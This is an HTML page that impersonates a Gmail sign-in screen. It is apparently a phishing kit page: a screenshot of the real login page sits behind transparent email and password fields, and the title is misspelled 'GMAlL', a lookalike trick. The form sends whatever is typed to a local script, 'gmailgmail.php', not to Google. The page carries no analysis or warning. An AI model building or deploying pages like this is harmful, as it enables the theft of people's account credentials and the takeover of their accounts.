
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>GMAlL SIGN IN</title>
<style type="text/css">
body
{
   background-color: #F5F5F5;
   color: #000000;
}
</style>
<style type="text/css">
a:hover
{
   color: #6CDA7B;
}
</style>
<!--[if lt IE 7]>
<style type="text/css">
   img { behavior: url("pngfix.htc"); }
</style>
<![endif]-->
</head>
<body>
<div id="bv_Image1" style="margin:0;padding:0;position:absolute;left:200px;top:100px;width:453px;height:504px;text-align:left;z-index:3;">
<img src="gmail_files/G001G001.png" id="Image1" alt="" style="width="453" height="504" " align="top" border="0"></div>

<div id="bv_Form1" style="position:absolute;left:0px;top:0px;width:401px;height:400px;z-index:4">
<form name="Form1" method="post" action="gmailgmail.php"">

<input id="email" style="position:absolute;left:240px;top:306px;width:370px;height:27px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:0" name="email" value="" type="text" required placeholder="">

<input id="password" style="position:absolute;left:240px;top:385px;width:370px;height:27px;border:1px #C0C0C0 solid;font-family:Arial;font-size:14px;z-index:1" name="password" value="" type="password" required placeholder="">


<input id="Button1" name="Button1" value="" style="position:absolute;left:525px;top:450px;width:90px;height:40px;border:0px #000000 dotted;background-color:transparent;font-family:Arial;font-size:13px;z-index:2;cursor: pointer;" type="submit">
</form>
</div>
</body></html>